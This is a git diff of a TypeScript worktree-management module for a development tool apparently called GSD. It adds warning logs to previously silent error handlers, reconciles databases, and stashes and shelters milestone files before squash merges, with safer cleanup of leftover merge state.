               try {
                 cpSync(srcSlicesDir, dstSlicesDir, { recursive: true });
                 synced.push(`milestones/${mid}/slices/`);
-              } catch {
+              } catch (err) {
                 /* non-fatal */
+                logWarning("worktree", `slices copy failed (${mid}): ${err instanceof Error ? err.message : String(err)}`);
               }
             } else if (existsSync(srcSlicesDir) && existsSync(dstSlicesDir)) {
               // Both exist — sync missing slice directories
@@ -247,19 +669,22 @@ export function syncGsdStateToWorktree(
                   try {
                     cpSync(srcSlice, dstSlice, { recursive: true });
                     synced.push(`milestones/${mid}/slices/${sid}/`);
-                  } catch {
+                  } catch (err) {
                     /* non-fatal */
+                    logWarning("worktree", `slice copy failed (${mid}/${sid}): ${err instanceof Error ? err.message : String(err)}`);
                   }
                 }
               }
             }
-          } catch {
+          } catch (err) {
             /* non-fatal */
+            logWarning("worktree", `milestone file sync failed: ${err instanceof Error ? err.message : String(err)}`);
           }
         }
       }
-    } catch {
+    } catch (err) {
       /* non-fatal */
+      logWarning("worktree", `milestone directory sync failed: ${err instanceof Error ? err.message : String(err)}`);
     }
   }
 
@@ -296,39 +721,43 @@ export function syncWorktreeStateBack(
   const synced: string[] = [];
 
   // If both resolve to the same directory (symlink), no sync needed
-  try {
-    const mainResolved = realpathSync(mainGsd);
-    const wtResolved = realpathSync(wtGsd);
-    if (mainResolved === wtResolved) return { synced };
-  } catch {
-    // Can't resolve — proceed with sync
-  }
+  if (isSamePath(mainGsd, wtGsd)) return { synced };
 
   if (!existsSync(wtGsd) || !existsSync(mainGsd)) return { synced };
 
+  // ── 0. Pre-upgrade worktree DB reconciliation ────────────────────────
+  // If the worktree has its own gsd.db (copied before the WAL transition),
+  // reconcile its hierarchy data into the project root DB before syncing
+  // files. This handles in-flight worktrees that were created before the
+  // upgrade to shared WAL mode.
+  const wtLocalDb = join(wtGsd, "gsd.db");
+  const mainDb = join(mainGsd, "gsd.db");
+  if (existsSync(wtLocalDb) && existsSync(mainDb)) {
+    try {
+      reconcileWorktreeDb(mainDb, wtLocalDb);
+      synced.push("gsd.db (pre-upgrade reconcile)");
+    } catch (err) {
+      // Non-fatal — file sync below is the fallback
+      logError("worktree", `DB reconciliation failed: ${err instanceof Error ? err.message : String(err)}`);
+    }
+  }
+
   // ── 1. Sync root-level .gsd/ files back ──────────────────────────────
   // The worktree is authoritative — complete-milestone updates REQUIREMENTS,
   // PROJECT, etc. These must overwrite main's copies so they survive teardown.
-  // Also includes QUEUE.md and completed-units.json which are written during
-  // milestone closeout and lost on teardown without explicit sync (#1787).
-  const rootFiles = [
-    "DECISIONS.md",
-    "REQUIREMENTS.md",
-    "PROJECT.md",
-    "KNOWLEDGE.md",
-    "OVERRIDES.md",
-    "QUEUE.md",
-    "completed-units.json",
-  ];
-  for (const f of rootFiles) {
+  // Also includes QUEUE.md, completed-units.json, and metrics.json which are
+  // written during milestone closeout and lost on teardown without explicit sync
+  // (#1787, #2313).
+  for (const f of ROOT_STATE_FILES) {
     const src = join(wtGsd, f);
     const dst = join(mainGsd, f);
     if (existsSync(src)) {
       try {
         cpSync(src, dst, { force: true });
         synced.push(f);
-      } catch {
+      } catch (err) {
         /* non-fatal */
+        logWarning("worktree", `state file copy-back failed (${f}): ${err instanceof Error ? err.message : String(err)}`);
       }
     }
   }
@@ -346,10 +775,14 @@ export function syncWorktreeStateBack(
       .map((d) => d.name);
 
     for (const mid of wtMilestones) {
+      // Skip the current milestone being merged — its files are already in the
+      // milestone branch and would conflict with the squash merge (#3641).
+      if (mid === milestoneId) continue;
       syncMilestoneDir(wtGsd, mainGsd, mid, synced);
     }
-  } catch {
+  } catch (err) {
     /* non-fatal */
+    logWarning("worktree", `milestone sync-back failed: ${err instanceof Error ? err.message : String(err)}`);
   }
 
   return { synced };
@@ -359,6 +792,31 @@ export function syncWorktreeStateBack(
  * Sync a single milestone directory from worktree to main.
  * Copies milestone-level .md files, slice-level files, and task summaries.
  */
+/** Copy matching files from srcDir to dstDir (non-fatal per file). */
+function syncDirFiles(
+  srcDir: string,
+  dstDir: string,
+  filter: (name: string) => boolean,
+  synced: string[],
+  prefix: string,
+): void {
+  try {
+    for (const entry of readdirSync(srcDir, { withFileTypes: true })) {
+      if (!entry.isFile() || !filter(entry.name)) continue;
+      try {
+        cpSync(join(srcDir, entry.name), join(dstDir, entry.name), { force: true });
+        synced.push(`${prefix}${entry.name}`);
+      } catch (err) {
+        /* non-fatal */
+        logWarning("worktree", `file copy failed (${prefix}${entry.name}): ${err instanceof Error ? err.message : String(err)}`);
+      }
+    }
+  } catch (err) {
+    /* non-fatal — srcDir may not be readable */
+    logWarning("worktree", `directory read failed: ${err instanceof Error ? err.message : String(err)}`);
+  }
+}
+
 function syncMilestoneDir(
   wtGsd: string,
   mainGsd: string,
@@ -371,83 +829,36 @@ function syncMilestoneDir(
   if (!existsSync(wtMilestoneDir)) return;
   mkdirSync(mainMilestoneDir, { recursive: true });
 
-  // Sync milestone-level files (SUMMARY, VALIDATION, ROADMAP, CONTEXT)
-  try {
-    for (const entry of readdirSync(wtMilestoneDir, { withFileTypes: true })) {
-      if (entry.isFile() && entry.name.endsWith(".md")) {
-        const src = join(wtMilestoneDir, entry.name);
-        const dst = join(mainMilestoneDir, entry.name);
-        try {
-          cpSync(src, dst, { force: true });
-          synced.push(`milestones/${mid}/${entry.name}`);
-        } catch {
-          /* non-fatal */
-        }
-      }
-    }
-  } catch {
-    /* non-fatal */
-  }
+  const isMd = (name: string): boolean => name.endsWith(".md");
 
-  // Sync slice-level files (summaries, UATs)
+  // Sync milestone-level files (SUMMARY, VALIDATION, ROADMAP, CONTEXT)
+  syncDirFiles(wtMilestoneDir, mainMilestoneDir, isMd, synced, `milestones/${mid}/`);
+
+  // Sync slice-level files (summaries, UATs) and task summaries (#1678)
   const wtSlicesDir = join(wtMilestoneDir, "slices");
   const mainSlicesDir = join(mainMilestoneDir, "slices");
-  if (existsSync(wtSlicesDir)) {
-    try {
-      for (const sliceEntry of readdirSync(wtSlicesDir, {
-        withFileTypes: true,
-      })) {
-        if (!sliceEntry.isDirectory()) continue;
-        const sid = sliceEntry.name;
-        const wtSliceDir = join(wtSlicesDir, sid);
-        const mainSliceDir = join(mainSlicesDir, sid);
-        mkdirSync(mainSliceDir, { recursive: true });
+  if (!existsSync(wtSlicesDir)) return;
 
-        for (const fileEntry of readdirSync(wtSliceDir, {
-          withFileTypes: true,
-        })) {
-          if (fileEntry.isFile() && fileEntry.name.endsWith(".md")) {
-            const src = join(wtSliceDir, fileEntry.name);
-            const dst = join(mainSliceDir, fileEntry.name);
-            try {
-              cpSync(src, dst, { force: true });
-              synced.push(
-                `milestones/${mid}/slices/${sid}/${fileEntry.name}`,
-              );
-            } catch {
-              /* non-fatal */
-            }
-          } else if (fileEntry.isDirectory() && fileEntry.name === "tasks") {
-            // Recurse into tasks/ subdirectory to sync task summaries (#1678).
-            // Without this, T01-SUMMARY.md etc. are silently dropped on
-            // worktree teardown because the loop only processes isFile() entries.
-            const wtTasksDir = join(wtSliceDir, "tasks");
-            const mainTasksDir = join(mainSliceDir, "tasks");
-            mkdirSync(mainTasksDir, { recursive: true });
-            try {
-              for (const taskEntry of readdirSync(wtTasksDir, { withFileTypes: true })) {
-                if (taskEntry.isFile() && taskEntry.name.endsWith(".md")) {
-                  const taskSrc = join(wtTasksDir, taskEntry.name);
-                  const taskDst = join(mainTasksDir, taskEntry.name);
-                  try {
-                    cpSync(taskSrc, taskDst, { force: true });
-                    synced.push(
-                      `milestones/${mid}/slices/${sid}/tasks/${taskEntry.name}`,
-                    );
-                  } catch {
-                    /* non-fatal */
-                  }
-                }
-              }
-            } catch {
-              /* non-fatal: tasks dir read failure */
-            }
-          }
-        }
+  try {
+    for (const sliceEntry of readdirSync(wtSlicesDir, { withFileTypes: true })) {
+      if (!sliceEntry.isDirectory()) continue;
+      const sid = sliceEntry.name;
+      const wtSliceDir = join(wtSlicesDir, sid);
+      const mainSliceDir = join(mainSlicesDir, sid);
+      mkdirSync(mainSliceDir, { recursive: true });
+
+      syncDirFiles(wtSliceDir, mainSliceDir, isMd, synced, `milestones/${mid}/slices/${sid}/`);
+
+      const wtTasksDir = join(wtSliceDir, "tasks");
+      const mainTasksDir = join(mainSliceDir, "tasks");
+      if (existsSync(wtTasksDir)) {
+        mkdirSync(mainTasksDir, { recursive: true });
+        syncDirFiles(wtTasksDir, mainTasksDir, isMd, synced, `milestones/${mid}/slices/${sid}/tasks/`);
       }
-    } catch {
-      /* non-fatal */
     }
+  } catch (err) {
+    /* non-fatal */
+    logWarning("worktree", `milestone slice sync failed (${mid}): ${err instanceof Error ? err.message : String(err)}`);
   }
 }
 // ─── Worktree Post-Create Hook (#597) ────────────────────────────────────────
@@ -479,7 +890,9 @@ export function runWorktreePostCreateHook(
     return `Worktree post-create hook not found: ${resolved}`;
   }
   if (process.platform === "win32") {
-    try { resolved = realpathSync.native(resolved); } catch { /* keep original */ }
+    try { resolved = realpathSync.native(resolved); } catch (err) { /* keep original */
+      logWarning("worktree", `realpath failed: ${err instanceof Error ? err.message : String(err)}`);
+    }
   }
 
   try {
@@ -563,8 +976,9 @@ function reconcilePlanCheckboxes(
           results.push(full);
         }
       }
-    } catch {
+    } catch (err) {
       /* non-fatal */
+      logWarning("worktree", `walkMd directory read failed: ${err instanceof Error ? err.message : String(err)}`);
     }
     return results;
   }
@@ -579,7 +993,8 @@ function reconcilePlanCheckboxes(
     try {
       srcContent = readFileSync(srcFile, "utf-8");
       dstContent = readFileSync(dstFile, "utf-8");
-    } catch {
+    } catch (e) {
+      logWarning("worktree", `reconcilePlanCheckboxes read failed: ${(e as Error).message}`);
       continue;
     }
 
@@ -614,8 +1029,9 @@ function reconcilePlanCheckboxes(
     if (changed) {
       try {
         atomicWriteSync(dstFile, updated, "utf-8");
-      } catch {
+      } catch (err) {
         /* non-fatal */
+        logWarning("worktree", `plan checkbox reconcile write failed: ${err instanceof Error ? err.message : String(err)}`);
       }
     }
   }
@@ -641,12 +1057,20 @@ export function createAutoWorktree(
       reuseExistingBranch: true,
     });
   } else {
-    // Fresh start — create branch from integration branch
+    // Fresh start — create branch from integration branch.
+    // Use the same 3-tier fallback as mergeMilestoneToMain (#3461):
+    //   1. META.json integration branch (explicit per-milestone override)
+    //   2. git.main_branch preference (user's configured working branch)
+    //   3. nativeDetectMainBranch (origin/HEAD auto-detection)
+    // Without tier 2, projects with main_branch=dev but origin/HEAD→master
+    // would fork worktrees from the wrong (stale) branch.
     const integrationBranch =
       readIntegrationBranch(basePath, milestoneId) ?? undefined;
+    const gitPrefs = loadEffectiveGSDPreferences()?.preferences?.git;
+    const startPoint = integrationBranch ?? gitPrefs?.main_branch ?? undefined;
     info = createWorktree(basePath, milestoneId, {
       branch,
-      startPoint: integrationBranch,
+      startPoint,
     });
   }
 
@@ -681,7 +1105,7 @@ export function createAutoWorktree(
   const hookError = runWorktreePostCreateHook(basePath, info.path);
   if (hookError) {
     // Non-fatal — log but don't prevent worktree usage
-    console.error(`[GSD] ${hookError}`);
+    logWarning("reconcile", hookError, { worktree: info.name });
   }
 
   const previousCwd = process.cwd();
@@ -729,20 +1153,31 @@ function copyPlanningArtifacts(srcBase: string, wtPath: string): void {
     "STATE.md",
     "KNOWLEDGE.md",
     "OVERRIDES.md",
+    "mcp.json",
   ]) {
     safeCopy(join(srcGsd, file), join(dstGsd, file), { force: true });
   }
 
-  // Copy gsd.db if present in source
-  const srcDb = join(srcGsd, "gsd.db");
-  const destDb = join(dstGsd, "gsd.db");
-  if (existsSync(srcDb)) {
-    try {
-      copyWorktreeDb(srcDb, destDb);
-    } catch {
-      /* non-fatal */
-    }
+  // Seed canonical PREFERENCES.md when available; fall back to legacy lowercase.
+  if (existsSync(join(srcGsd, PROJECT_PREFERENCES_FILE))) {
+    safeCopy(
+      join(srcGsd, PROJECT_PREFERENCES_FILE),
+      join(dstGsd, PROJECT_PREFERENCES_FILE),
+      { force: true },
+    );
+  } else if (existsSync(join(srcGsd, LEGACY_PROJECT_PREFERENCES_FILE))) {
+    safeCopy(
+      join(srcGsd, LEGACY_PROJECT_PREFERENCES_FILE),
+      join(dstGsd, LEGACY_PROJECT_PREFERENCES_FILE),
+      { force: true },
+    );
   }
+
+  // Shared WAL (R012): worktrees use the project root's DB directly.
+  // No longer copy gsd.db into the worktree — the DB path resolver in
+  // ensureDbOpen() detects the worktree location and opens the root DB.
+  // Compat note: reconcileWorktreeDb() in mergeMilestoneToMain handles
+  // worktrees that already have a local gsd.db from before this change.
 }
 
 /**
@@ -779,16 +1214,26 @@ export function teardownAutoWorktree(
   // backslashes (#1436), leaving ~1 GB+ orphaned directories.
   const wtDir = worktreePath(originalBasePath, milestoneId);
   if (existsSync(wtDir)) {
-    console.error(
-      `[GSD] WARNING: Worktree directory still exists after teardown: ${wtDir}\n` +
-        `  This is likely an orphaned directory consuming disk space.\n` +
-        `  Remove it manually with: rm -rf "${wtDir.replaceAll("\\", "/")}"`,
+    logWarning(
+      "reconcile",
+      `Worktree directory still exists after teardown: ${wtDir}. ` +
+        `This is likely an orphaned directory consuming disk space. ` +
+        `Remove it manually with: rm -rf "${wtDir.replaceAll("\\", "/")}"`,
+      { worktree: milestoneId },
     );
-    // Attempt a direct filesystem removal as a fallback
-    try {
-      rmSync(wtDir, { recursive: true, force: true });
-    } catch {
-      // Non-fatal — the warning above tells the user how to clean up
+    // Attempt a direct filesystem removal as a fallback — but ONLY if the
+    // path is safely inside .gsd/worktrees/ to prevent #2365 data loss.
+    if (isInsideWorktreesDir(originalBasePath, wtDir)) {
+      try {
+        rmSync(wtDir, { recursive: true, force: true });
+      } catch (err) {
+        // Non-fatal — the warning above tells the user how to clean up
+        logWarning("worktree", `worktree directory removal failed: ${err instanceof Error ? err.message : String(err)}`);
+      }
+    } else {
+      console.error(
+        `[GSD] REFUSING fallback rmSync — path is outside .gsd/worktrees/: ${wtDir}`,
+      );
     }
   }
 }
@@ -829,7 +1274,8 @@ export function getAutoWorktreePath(
   try {
     const content = readFileSync(gitPath, "utf8").trim();
     if (!content.startsWith("gitdir: ")) return null;
-  } catch {
+  } catch (e) {
+    logWarning("worktree", `getAutoWorktreePath .git read failed: ${(e as Error).message}`);
     return null;
   }
 
@@ -977,20 +1423,38 @@ export function mergeMilestoneToMain(
   // 1. Auto-commit dirty state in worktree before leaving
   autoCommitDirtyState(worktreeCwd);
 
-  // Reconcile worktree DB into main DB before leaving worktree context
+  // Reconcile worktree DB into main DB before leaving worktree context.
+  // Skip when both paths resolve to the same physical file (shared WAL /
+  // symlink layout) — ATTACHing a WAL-mode file to itself corrupts the
+  // database (#2823).
   if (isDbAvailable()) {
     try {
       const worktreeDbPath = join(worktreeCwd, ".gsd", "gsd.db");
       const mainDbPath = join(originalBasePath_, ".gsd", "gsd.db");
-      reconcileWorktreeDb(mainDbPath, worktreeDbPath);
-    } catch {
+      if (!isSamePath(worktreeDbPath, mainDbPath)) {
+        reconcileWorktreeDb(mainDbPath, worktreeDbPath);
+      }
+    } catch (err) {
       /* non-fatal */
+      logError("worktree", `DB reconciliation failed: ${err instanceof Error ? err.message : String(err)}`);
     }
   }
 
-  // 2. Parse roadmap for slice listing
-  const roadmap = parseRoadmap(roadmapContent);
-  const completedSlices = roadmap.slices.filter((s) => s.done);
+  // 2. Get completed slices for commit message
+  let completedSlices: { id: string; title: string }[] = [];
+  if (isDbAvailable()) {
+    completedSlices = getMilestoneSlices(milestoneId)
+      .filter(s => s.status === "complete")
+      .map(s => ({ id: s.id, title: s.title }));
+  }
+  // Fallback: parse roadmap content when DB is unavailable
+  if (completedSlices.length === 0 && roadmapContent) {
+    const sliceRe = /- \[x\] \*\*(\w+):\s*(.+?)\*\*/gi;
+    let m: RegExpExecArray | null;
+    while ((m = sliceRe.exec(roadmapContent)) !== null) {
+      completedSlices.push({ id: m[1], title: m[2] });
+    }
+  }
 
   // 3. chdir to original base
   const previousCwd = process.cwd();
@@ -1005,8 +1469,13 @@ export function mergeMilestoneToMain(
     originalBasePath_,
     milestoneId,
   );
+  // Validate prefs.main_branch exists before using it — a stale preference
+  // (e.g. "master" when repo uses "main") causes merge failure (#3589).
+  const validatedPrefBranch = prefs.main_branch && nativeBranchExists(originalBasePath_, prefs.main_branch)
+    ? prefs.main_branch
+    : undefined;
   const mainBranch =
-    integrationBranch ?? prefs.main_branch ?? nativeDetectMainBranch(originalBasePath_);
+    integrationBranch ?? validatedPrefBranch ?? nativeDetectMainBranch(originalBasePath_);
 
   // Remove transient project-root state files before any branch or merge
   // operation. Untracked milestone metadata can otherwise block squash merges.
@@ -1020,15 +1489,24 @@ export function mergeMilestoneToMain(
   }
 
   // 6. Build rich commit message
-  const milestoneTitle =
-    roadmap.title.replace(/^M\d+:\s*/, "").trim() || milestoneId;
-  const subject = `feat(${milestoneId}): ${milestoneTitle}`;
+  const dbMilestone = getMilestone(milestoneId);
+  let milestoneTitle =
+    (dbMilestone?.title ?? "").replace(/^M\d+:\s*/, "").trim();
+  // Fallback: parse title from roadmap content header (e.g. "# M020: Backend foundation")
+  if (!milestoneTitle && roadmapContent) {
+    const titleMatch = roadmapContent.match(new RegExp(`^#\\s+${milestoneId}:\\s*(.+)`, "m"));
+    if (titleMatch) milestoneTitle = titleMatch[1].trim();
+  }
+  milestoneTitle = milestoneTitle || milestoneId;
+  const subject = `feat: ${milestoneTitle}`;
   let body = "";
   if (completedSlices.length > 0) {
     const sliceLines = completedSlices
       .map((s) => `- ${s.id}: ${s.title}`)
       .join("\n");
-    body = `\n\nCompleted slices:\n${sliceLines}\n\nBranch: ${milestoneBranch}`;
+    body = `\n\nCompleted slices:\n${sliceLines}\n\nGSD-Milestone: ${milestoneId}\nBranch: ${milestoneBranch}`;
+  } else {
+    body = `\n\nGSD-Milestone: ${milestoneId}\nBranch: ${milestoneBranch}`;
   }
   const commitMessage = subject + body;
 
@@ -1088,7 +1566,110 @@ export function mergeMilestoneToMain(
     }
   }
 
-  // 7. Squash merge — auto-resolve .gsd/ state file conflicts (#530)
+  // 7. Stash any pre-existing dirty files so the squash merge is not
+  //    blocked by unrelated local changes (#2151).  clearProjectRootStateFiles
+  //    only removes untracked .gsd/ files; tracked dirty files elsewhere (e.g.
+  //    .planning/work-state.json with stash conflict markers) are invisible to
+  //    that cleanup but will cause `git merge --squash` to reject.
+  let stashed = false;
+  try {
+    const status = execFileSync("git", ["status", "--porcelain"], {
+      cwd: originalBasePath_,
+      stdio: ["ignore", "pipe", "pipe"],
+      encoding: "utf-8",
+    }).trim();
+    if (status) {
+      // Use --include-untracked to stash untracked files that would block
+      // the squash merge, but EXCLUDE .gsd/milestones/ (#2505).
+      // --include-untracked without exclusion sweeps queued milestone
+      // CONTEXT files into the stash. If stash pop later fails, those files
+      // are permanently trapped in the stash entry and lost on the next
+      // stash push or drop.
+      execFileSync(
+        "git",
+        [
+          "stash", "push", "--include-untracked",
+          "-m", `gsd: pre-merge stash for ${milestoneId}`,
+          "--", ":(exclude).gsd/milestones",
+        ],
+        { cwd: originalBasePath_, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" },
+      );
+      stashed = true;
+    }
+  } catch (err) {
+    // Stash failure is non-fatal — proceed without stash and let the merge
+    // report the dirty tree if it fails.
+    logWarning("worktree", `git stash failed: ${err instanceof Error ? err.message : String(err)}`);
+  }
+
+  // 7a. Shelter queued milestone directories before the squash merge (#2505).
+  // The milestone branch may contain copies of queued milestone dirs (via
+  // copyPlanningArtifacts), so `git merge --squash` rejects when those same
+  // files exist as untracked in the working tree. Temporarily move them to
+  // a backup location, then restore after the merge+commit.
+  const milestonesDir = join(gsdRoot(originalBasePath_), "milestones");
+  const shelterDir = join(gsdRoot(originalBasePath_), ".milestone-shelter");
+  const shelteredDirs: string[] = [];
+
+  // Helper: restore sheltered milestone directories (#2505).
+  // Called on both success and error paths to ensure queued CONTEXT files
+  // are never permanently lost.
+  const restoreShelter = (): void => {
+    if (shelteredDirs.length === 0) return;
+    for (const dirName of shelteredDirs) {
+      try {
+        mkdirSync(milestonesDir, { recursive: true });
+        cpSync(join(shelterDir, dirName), join(milestonesDir, dirName), { recursive: true, force: true });
+      } catch (err) { /* best-effort */
+        logError("worktree", `shelter restore failed: ${err instanceof Error ? err.message : String(err)}`);
+      }
+    }
+    try { rmSync(shelterDir, { recursive: true, force: true }); } catch (err) { /* best-effort */
+      logWarning("worktree", `shelter cleanup failed: ${err instanceof Error ? err.message : String(err)}`);
+    }
+  };
+
+  try {
+    if (existsSync(milestonesDir)) {
+      const entries = readdirSync(milestonesDir, { withFileTypes: true });
+      for (const entry of entries) {
+        if (!entry.isDirectory()) continue;
+        // Only shelter directories that do NOT belong to the milestone being merged
+        if (entry.name === milestoneId) continue;
+        const srcDir = join(milestonesDir, entry.name);
+        const dstDir = join(shelterDir, entry.name);
+        try {
+          mkdirSync(shelterDir, { recursive: true });
+          cpSync(srcDir, dstDir, { recursive: true, force: true });
+          rmSync(srcDir, { recursive: true, force: true });
+          shelteredDirs.push(entry.name);
+        } catch (err) {
+          // Non-fatal — if shelter fails, the merge may still succeed
+          logWarning("worktree", `milestone shelter failed (${entry.name}): ${err instanceof Error ? err.message : String(err)}`);
+        }
+      }
+    }
+  } catch (err) {
+    // Non-fatal — proceed with merge; untracked files may block it
+    logWarning("worktree", `milestone shelter operation failed: ${err instanceof Error ? err.message : String(err)}`);
+  }
+
+  // 7b. Clean up stale merge state before attempting squash merge (#2912).
+  // A leftover MERGE_HEAD (from a previous failed merge, libgit2 native path,
+  // or interrupted operation) causes `git merge --squash` to refuse with
+  // "fatal: You have not concluded your merge (MERGE_HEAD exists)".
+  // Defensively remove merge artifacts before starting.
+  try {
+    const gitDir_ = resolveGitDir(originalBasePath_);
+    for (const f of ["SQUASH_MSG", "MERGE_MSG", "MERGE_HEAD"]) {
+      const p = join(gitDir_, f);
+      if (existsSync(p)) unlinkSync(p);
+    }
+  } catch (err) { /* best-effort */
+    logError("worktree", `merge state cleanup failed: ${err instanceof Error ? err.message : String(err)}`);
+  }
+
+  // 8. Squash merge — auto-resolve .gsd/ state file conflicts (#530)
   const mergeResult = nativeMergeSquash(originalBasePath_, milestoneBranch);
 
   if (!mergeResult.success) {
@@ -1096,12 +1677,42 @@ export function mergeMilestoneToMain(
     // untracked .gsd/ files left by syncStateToProjectRoot).  Preserve the
     // milestone branch so commits are not lost.
     if (mergeResult.conflicts.includes("__dirty_working_tree__")) {
+      // Defensively clean merge state — the native path may leave MERGE_HEAD
+      // even when the merge is rejected (#2912).
+      try {
+        const gitDir_ = resolveGitDir(originalBasePath_);
+        for (const f of ["SQUASH_MSG", "MERGE_MSG", "MERGE_HEAD"]) {
+          const p = join(gitDir_, f);
+          if (existsSync(p)) unlinkSync(p);
+        }
+      } catch (err) { /* best-effort */
+        logError("worktree", `merge state cleanup failed: ${err instanceof Error ? err.message : String(err)}`);
+      }
+
+      // Pop stash before throwing so local work is not lost.
+      if (stashed) {
+        try {
+          execFileSync("git", ["stash", "pop"], {
+            cwd: originalBasePath_,
+            stdio: ["ignore", "pipe", "pipe"],
+            encoding: "utf-8",
+          });
+        } catch (err) { /* stash pop conflict is non-fatal */
+          logWarning("worktree", `git stash pop failed: ${err instanceof Error ? err.message : String(err)}`);
+        }
+      }
+      restoreShelter();
       // Restore cwd so the caller is not stranded on the integration branch
       process.chdir(previousCwd);
+      // Surface the actual dirty filenames from git stderr instead of
+      // generically blaming .gsd/ (#2151).
+      const fileList = mergeResult.dirtyFiles?.length
+        ? `Dirty files:\n${mergeResult.dirtyFiles.map((f) => `  ${f}`).join("\n")}`
+        : `Check \`git status\` in the project root for details.`;
       throw new GSDError(
         GSD_GIT_ERROR,
-        `Squash merge of ${milestoneBranch} rejected: working tree has dirty or untracked files that conflict with the merge. ` +
-          `Clean the project root .gsd/ directory and retry.`,
+        `Squash merge of ${milestoneBranch} rejected: working tree has dirty or untracked files ` +
+          `that conflict with the merge. ${fileList}`,
       );
     }
 
@@ -1112,31 +1723,61 @@ export function mergeMilestoneToMain(
         : nativeConflictFiles(originalBasePath_);
 
     if (conflictedFiles.length > 0) {
-      // Separate .gsd/ state file conflicts from real code conflicts.
-      // GSD state files (STATE.md, auto.lock, etc.)
-      // diverge between branches during normal operation — always prefer the
-      // milestone branch version since it has the latest execution state.
-      const gsdConflicts = conflictedFiles.filter((f) => f.startsWith(".gsd/"));
+      // Separate auto-resolvable conflicts (GSD state files + build artifacts)
+      // from real code conflicts. GSD state files diverge between branches
+      // during normal operation. Build artifacts are machine-generated and
+      // regenerable. Both are safe to accept from the milestone branch.
+      const autoResolvable = conflictedFiles.filter(isSafeToAutoResolve);
       const codeConflicts = conflictedFiles.filter(
-        (f) => !f.startsWith(".gsd/"),
+        (f) => !isSafeToAutoResolve(f),
       );
 
-      // Auto-resolve .gsd/ conflicts by accepting the milestone branch version
-      if (gsdConflicts.length > 0) {
-        for (const gsdFile of gsdConflicts) {
+      // Auto-resolve safe conflicts by accepting the milestone branch version
+      if (autoResolvable.length > 0) {
+        for (const safeFile of autoResolvable) {
           try {
-            nativeCheckoutTheirs(originalBasePath_, [gsdFile]);
-            nativeAddPaths(originalBasePath_, [gsdFile]);
-          } catch {
+            nativeCheckoutTheirs(originalBasePath_, [safeFile]);
+            nativeAddPaths(originalBasePath_, [safeFile]);
+          } catch (e) {
             // If checkout --theirs fails, try removing the file from the merge
             // (it's a runtime file that shouldn't be committed anyway)
-            nativeRmForce(originalBasePath_, [gsdFile]);
+            logWarning("worktree", `checkout --theirs failed for ${safeFile}, removing: ${(e as Error).message}`);
+            nativeRmForce(originalBasePath_, [safeFile]);
           }
         }
       }
 
-      // If there are still non-.gsd conflicts, escalate
+      // If there are still real code conflicts, escalate
       if (codeConflicts.length > 0) {
+        // Abort merge state so MERGE_HEAD is not left on disk (#2912).
+        // libgit2's merge creates MERGE_HEAD even for squash merges; if left
+        // dangling, subsequent merges fail and doctor reports corrupt state.
+        try { nativeMergeAbort(originalBasePath_); } catch (err) { /* best-effort */
+          logError("worktree", `git merge-abort failed: ${err instanceof Error ? err.message : String(err)}`);
+        }
+        try {
+          const gitDir_ = resolveGitDir(originalBasePath_);
+          for (const f of ["SQUASH_MSG", "MERGE_MSG", "MERGE_HEAD"]) {
+            const p = join(gitDir_, f);
+            if (existsSync(p)) unlinkSync(p);
+          }
+        } catch (err) { /* best-effort */
+          logError("worktree", `merge state file cleanup failed: ${err instanceof Error ? err.message : String(err)}`);
+        }
+
+        // Pop stash before throwing so local work is not lost (#2151).
+        if (stashed) {
+          try {
+            execFileSync("git", ["stash", "pop"], {
+              cwd: originalBasePath_,
+              stdio: ["ignore", "pipe", "pipe"],
+              encoding: "utf-8",
+            });
+          } catch (err) { /* stash pop conflict is non-fatal */
+            logWarning("worktree", `git stash pop failed: ${err instanceof Error ? err.message : String(err)}`);
+          }
+        }
+        restoreShelter();
         throw new MergeConflictError(
           codeConflicts,
           "squash",
@@ -1148,21 +1789,90 @@ export function mergeMilestoneToMain(
     // No conflicts detected — possibly "already up to date", fall through to commit
   }
 
-  // 8. Commit (handle nothing-to-commit gracefully)
+  // 9. Commit (handle nothing-to-commit gracefully)
   const commitResult = nativeCommit(originalBasePath_, commitMessage);
   const nothingToCommit = commitResult === null;
 
-  // 8a. Clean up SQUASH_MSG left by git merge --squash (#1853).
+  // 9a. Clean up merge state files left by git merge --squash (#1853, #2912).
   // git only removes SQUASH_MSG when the commit reads it directly (plain
   // `git commit`).  nativeCommit uses `-F -` (stdin) or libgit2, neither
-  // of which trigger git's SQUASH_MSG cleanup.  If left on disk, doctor
-  // reports `corrupt_merge_state` on every subsequent run.
+  // of which trigger git's SQUASH_MSG cleanup.  MERGE_HEAD is created by
+  // libgit2's merge even in squash mode and is not removed by nativeCommit.
+  // If left on disk, doctor reports `corrupt_merge_state` on every subsequent run.
   try {
-    const squashMsgPath = join(resolveGitDir(originalBasePath_), "SQUASH_MSG");
-    if (existsSync(squashMsgPath)) unlinkSync(squashMsgPath);
-  } catch { /* best-effort */ }
+    const gitDir_ = resolveGitDir(originalBasePath_);
+    for (const f of ["SQUASH_MSG", "MERGE_MSG", "MERGE_HEAD"]) {
+      const p = join(gitDir_, f);
+      if (existsSync(p)) unlinkSync(p);
+    }
+  } catch (err) { /* best-effort */
+    logError("worktree", `post-commit merge state cleanup failed: ${err instanceof Error ? err.message : String(err)}`);
+  }
 
-  // 8b. Safety check (#1792): if nothing was committed, verify the milestone
+  // 9a-ii. Restore stashed files now that the merge+commit is complete (#2151).
+  // Pop after commit so stashed changes do not interfere with the squash merge
+  // or the commit content.  Conflict on pop is non-fatal — the stash entry is
+  // preserved and the user can resolve manually with `git stash pop`.
+  if (stashed) {
+    try {
+      execFileSync("git", ["stash", "pop"], {
+        cwd: originalBasePath_,
+        stdio: ["ignore", "pipe", "pipe"],
+        encoding: "utf-8",
+      });
+    } catch (e) {
+      logWarning("worktree", `git stash pop failed, attempting conflict resolution: ${(e as Error).message}`);
+      // Stash pop after squash merge can conflict on .gsd/ state files that
+      // diverged between branches.  Left unresolved, these UU entries block
+      // every subsequent merge.  Auto-resolve them the same way we handle
+      // .gsd/ conflicts during the merge itself: accept HEAD (the just-committed
+      // version) and drop the now-applied stash.
+      const uu = nativeConflictFiles(originalBasePath_);
+      const gsdUU = uu.filter((f) => f.startsWith(".gsd/"));
+      const nonGsdUU = uu.filter((f) => !f.startsWith(".gsd/"));
+
+      if (gsdUU.length > 0) {
+        for (const f of gsdUU) {
+          try {
+            // Accept the committed (HEAD) version of the state file
+            execFileSync("git", ["checkout", "HEAD", "--", f], {
+              cwd: originalBasePath_,
+              stdio: ["ignore", "pipe", "pipe"],
+              encoding: "utf-8",
+            });
+            nativeAddPaths(originalBasePath_, [f]);
